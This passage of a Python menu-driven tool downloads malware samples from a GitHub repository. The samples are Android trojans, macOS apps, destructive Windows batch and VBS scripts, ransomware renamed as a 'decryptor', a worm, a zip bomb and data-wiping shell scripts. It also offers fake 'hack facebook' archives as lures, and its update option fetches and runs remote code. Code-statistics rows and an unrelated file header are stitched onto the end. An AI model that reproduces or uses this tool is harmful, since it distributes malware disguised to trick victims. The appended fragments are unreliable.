os.system("mv 'FakeValidation.apk?raw=true' Android/FakeValidation.apk")
print(fun)#####done
elif menu1 == 12:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Fobus.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Fobus.apk?raw=true' Android/Fobus.apk")
print(fun)#####done
elif menu1 == 13:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/GinMaster.Z.AdvancedObfuscation.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'GinMaster.Z.AdvancedObfuscation.apk?raw=true' Android/GinMaster.apk")
print(fun)#####done
elif menu1 == 14:###done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Masnu.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Masnu.apk?raw=true' Android/Masnu.apk")
print(fun)#####done
elif menu1 == 15:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Minecraft2.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Minecraft2.apk?raw=true' Android/Elite.apk")
print(fun)#####done
elif menu1 == 16:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Omigo.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Omigo.apk?raw=true' Android/Omigo.apk")
print(fun)#####done
elif menu1 == 17:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Opfake.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Opfake.apk?raw=true' Android/Opfake.apk")
print(fun)#####done
elif menu1 == 18:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/SmsWorker.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'SmsWorker.apk?raw=true' Android/SmsWorker.apk")
print(fun)#####done
elif menu1 == 19:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Vietcon.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Vietcon.apk?raw=true' Android/Vietcon.apk")
print(fun)#####done
elif menu1 == 20:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/candy_corn.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'candy_corn.apk?raw=true' Android/Candycorn.apk")
print(fun)#####done
elif menu1 == 21:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/cat.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'cat.apk?raw=true' Android/Cat.apk")
print(fun)#####done
elif menu1 == 22:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/chistescortos.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'chistescortos.apk?raw=true' Android/Chistescortos.apk")
print(fun)#####done
elif menu1 == 23:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/chistespicanticos.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'chistespicanticos.apk?raw=true' Android/Chistespicanticos.apk")
print(fun)#####done
elif menu1 == 24:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.funnyys.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.funnyys.apk?raw=true' Android/ComFunnys.apk")
print(fun)#####done
elif menu1 == 25:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.imagepets.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.imagepets.apk?raw=true' Android/ComImagePets.apk")
print(fun)#####done
elif menu1 == 26:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.kitchenn.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.kitchenn.apk?raw=true' Android/ComKitchen.apk")
print(fun)#####done
elif menu1 == 27:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.laughtter.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.laughtter.apk?raw=true' Android/ComLaughtter.apk")
print(fun)#####done
elif menu1 == 28:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.prasesamor.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.prasesamor.apk?raw=true' Android/Prasesamor.apk")
print(fun)#####done
elif menu1 == 29:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.prasesfee.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.prasesfee.apk?raw=true' Android/Prasesfee.apk")
print(fun)#####done
elif menu1 == 30:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.recipesmart.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.recipesmart.apk?raw=true' Android/Recipesmart.apk")
print(fun)#####done
elif menu1 == 31:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.romaticpos.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.romaticpos.apk?raw=true' Android/Romaticpos.apk")
print(fun)#####done
elif menu1 == 32:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.statetss.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.statetss.apk?raw=true' Android/Statetss.apk")
print(fun)#####done
elif menu1 == 33:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/com.thinkking.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'com.thinkking.apk?raw=true' Android/Thinkking.apk")
print(fun)#####done
elif menu1 == 34:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/crd.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'crd.apk?raw=true' Android/Crd.apk")
print(fun)#####done
elif menu1 == 35:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/dendroid.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'dendroid.apk?raw=true' Android/Dendroid.apk")
print(fun)#####done
elif menu1 == 36:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ds.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'ds.apk?raw=true' Android/Ds.apk")
print(fun)#####done
elif menu1 == 37:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/facebook.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'facebook.apk?raw=true' Android/Facebook.apk")
print(fun)#####done
elif menu1 == 38:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Fake_av.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Fake_av.apk?raw=true' Android/Fakeav.apk")
print(fun)#####done
elif menu1 == 39:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ArtStation.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'ArtStation.apk?raw=true' Android/ArtStation.apk")
print(fun)#####done
elif menu1 == 40:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Adware.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Adware.apk?raw=true' Android/MusicPlayerAdware.apk")
print(fun)#####done
elif menu1 == 41:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Settings.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Settings.apk?raw=true' Android/Settings.apk")
print(fun)#####done
elif menu1 == 42:####done
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
#################ANDROID DONE
#################Start Macosx
def Vmacosx():
print(""+O+"["+R+"1"+O+"] Trinoids")
print(""+O+"["+R+"2"+O+"] Nothing")
print(""+O+"["+R+"3"+O+"] Back")
try:
menu2 = input("Input number > "+R+"")
if menu2 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/trinoids.app?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'trinoids.app?raw=true' Macosx/Trinoids.app")
print(fun)#####done
elif menu2 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/nothing.app?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'nothing.app?raw=true' Macosx/Nothing.app")
print(fun)#####done
elif menu2 == 3:
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
####################Done Macosx
###################Start PC
def vpcwin():
print(""+O+"["+R+"1"+O+"] Ugly.bat\t\t["+R+"5"+O+"] Koce.bat\t\t["+R+"9"+O+"] Ransomeware")
print(""+O+"["+R+"2"+O+"] Sleepy.bat\t\t["+R+"6"+O+"] Cmd.bat\t\t["+R+"10"+O+"] Rip.bat")
print(""+O+"["+R+"3"+O+"] Reg-eater.bat\t["+R+"7"+O+"] Capslock.vbs\t["+R+"11"+O+"] Back")
print(""+O+"["+R+"4"+O+"] Kuis.bat\t\t["+R+"8"+O+"] Alay.vbs")
try:
menu3 = input("Input number > "+R+"")
if menu3 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ugly.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'ugly.bat?raw=true' Windows/Ugly.bat")
print(fun)#####done
elif menu3 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/sleepy.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'sleepy.bat?raw=true' Windows/Sleepy.bat")
print(fun)#####done
elif menu3 == 3:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/reg-eater.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'reg-eater.bat?raw=true' Windows/Reg-eater.bat")
print(fun)#####done
elif menu3 == 4:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/kuis.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'kuis.bat?raw=true' Windows/Kuis.bat")
print(fun)#####done
elif menu3 == 5:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/koce.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'koce.bat?raw=true' Windows/Koce.bat")
print(fun)#####done
elif menu3 == 6:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/cmd.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'cmd.bat?raw=true' Windows/Cmd.bat")
print(fun)#####done
elif menu3 == 7:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/capslock.vbs?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'capslock.vbs?raw=true' Windows/Capslock.vbs")
print(fun)#####done
elif menu3 == 8:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/alay.vbs?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'alay.vbs?raw=true' Windows/Alay.vbs")
print(fun)#####done
elif menu3 == 9:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/ransomeware.exe?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'ransomeware.exe?raw=true' Windows/RansomewareFileDecryptor.exe")
print(fun)#####done
elif menu3 == 10:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/RIP.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'RIP.bat?raw=true' Windows/RIP.bat")
print(fun)#####done
elif menu3 == 11:
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
#######################Done PC
####################start PDF
def Vpdfautorunpc():
print(""+O+"["+R+"1"+O+"] How to hack facebook (ext: rar)")
print(""+O+"["+R+"2"+O+"] Hack facebook (ext: rar)")
print(""+O+"["+R+"3"+O+"] Back")
try:
menu4 = input("Input Number >"+R+" ")
if menu4 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/howtohackfb.rar?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'howtohackfb.rar?raw=true' Pdf-autorun-windows/How-to-hack-facebook.rar")
print(fun)#####done
print("password: cracker\n")
elif menu4 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/hackfacebook.rar?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'hackfacebook.rar?raw=true' Pdf-autorun-windows/Hack-facebook.rar")
print(fun)#####done
print("password: cracker\n")
elif menu4 == 3:
print("\n")
menu()
else:
print(""+R+"[!] Wrong number")
except NameError:
print(""+R+"[!] This is not number")
except Exception as err:
print(""+R+"[!] This is not number")
######################Done pdf
############Worm and Bomb zip
def Vother():
print(""+O+"["+R+"1"+O+"] Worm.bat")
print(""+O+"["+R+"2"+O+"] Bomb.zip")
print(""+O+"["+R+"3"+O+"] Back")
try:
menu5 = input("Input number > "+R+"")
if menu5 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/worm.bat?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'worm.bat?raw=true' Worm-and-Bombzip/worm.bat")
print(fun)#####done
elif menu5 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/bom-zip.zip?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'bom-zip.zip?raw=true' Worm-and-Bombzip/Bomb.zip")
print(fun)#####done
elif menu5 == 3:
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
###############Start Shell Virus
def Shellvirus():
print(""+O+"["+R+"1"+O+"] Data-Eater.sh")
print(""+O+"["+R+"2"+O+"] Bootloop.sh")
print(""+O+"["+R+"3"+O+"] Back")
try:
menu6 = input("Input number > "+R+"")
if menu6 == 1:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/data-eater.sh?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'data-eater.sh?raw=true' Shell-virus/Data-Eater.sh")
print(fun)#####done
elif menu6 == 2:
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/bootloop.sh?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'bootloop.sh?raw=true' Shell-virus/Bootloop.sh")
print(fun)#####done
elif menu6 == 3:
print("\n")
menu()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
def banner2():
print(""+G+"Please do"+R+" NOT "+G+"use this tool for illegal activity")
print(""+R+"[!] "+G+"Keep legal don't illegal "+R+" [!]"+O+"")
def menu():
print("\n"+R+"[========== Menu ==========]"+O+"")
print(""+O+"["+R+"1"+O+"] Android\t\t["+R+"4"+O+"] Pdf Autorun PC\t\t["+R+"7"+O+"] Update tool")
print(""+O+"["+R+"2"+O+"] Macosx\t\t["+R+"5"+O+"] Other\t\t\t["+R+"8"+O+"] About")
print(""+O+"["+R+"3"+O+"] Windows\t\t["+R+"6"+O+"] Shell\t\t\t["+R+"9"+O+"] Exit")
try:
menu = input("\nInput Number > "+R+"")
if menu == 1:
os.system("clear")
Vandroid()
elif menu == 2:
os.system("clear")
Vmacosx()
elif menu == 3:
os.system("clear")
vpcwin()
elif menu == 4:
os.system("clear")
Vpdfautorunpc()
elif menu == 5:
os.system("clear")
Vother()
elif menu == 6:
os.system("clear")
Shellvirus()
elif menu == 7:
os.system("clear")
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Hider5/Malicious/blob/master/malicious.py?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'malicious.py?raw=true' malicious.py")
os.system("python2 malicious.py")
elif menu == 8:
os.system("clear")
about()
elif menu == 9:
fontcolor()
os.system("clear")
sys.exit()
else:
print(""+R+"[!] wrong number")
except Exception:
print(""+R+"[!] This is not number")
if __name__ == "__main__":
os.system("clear")
banner()
banner2()
menu()
fontcolor()
sys.exit()
| 38.74672 | 174 | 0.613001 | 5,719 | 38,398 | 4.102465 | 0.057003 | 0.092064 | 0.066491 | 0.03836 | 0.818387 | 0.774316 | 0.712684 | 0.707058 | 0.707058 | 0.705524 | 0 | 0.019998 | 0.165217 | 38,398 | 990 | 175 | 38.785859 | 0.703282 | 0.031095 | 0 | 0.682735 | 0 | 0.07287 | 0.300472 | 0.051486 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013453 | false | 0.002242 | 0.004484 | 0 | 0.017937 | 0.209641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4eec91b3fd8c0fdc4e547c1ec606dbb58c48209 | 43 | py | Python | chopro/utils.py | nomike/pychopro | 75632ed9666a1760bf83a55b4215b94ae3ba4fae | [
"MIT"
] | 10 | 2017-02-10T07:31:19.000Z | 2020-01-23T19:13:44.000Z | chopro/utils.py | nomike/pychopro | 75632ed9666a1760bf83a55b4215b94ae3ba4fae | [
"MIT"
] | 2 | 2017-02-12T12:18:11.000Z | 2019-11-03T14:04:27.000Z | chopro/utils.py | nomike/pychopro | 75632ed9666a1760bf83a55b4215b94ae3ba4fae | [
"MIT"
] | 7 | 2017-02-12T09:01:09.000Z | 2021-06-05T16:42:28.000Z | from chopro.chopro2html import chopro2html
| 21.5 | 42 | 0.883721 | 5 | 43 | 7.6 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051282 | 0.093023 | 43 | 1 | 43 | 43 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d4fb31dfd36788ff80f58d4876fd688387455d03 | 2,416 | py | Python | tests/test_yubico/test_mfa.py | TomVollerthun1337/logsmith | f2ecab4dea295d5493a9a3e77a2837b13fa139e5 | [
"Apache-2.0"
] | 19 | 2020-01-18T00:25:43.000Z | 2022-03-14T07:39:08.000Z | tests/test_yubico/test_mfa.py | TomVollerthun1337/logsmith | f2ecab4dea295d5493a9a3e77a2837b13fa139e5 | [
"Apache-2.0"
] | 85 | 2020-01-21T12:13:56.000Z | 2022-03-31T04:01:03.000Z | tests/test_yubico/test_mfa.py | TomVollerthun1337/logsmith | f2ecab4dea295d5493a9a3e77a2837b13fa139e5 | [
"Apache-2.0"
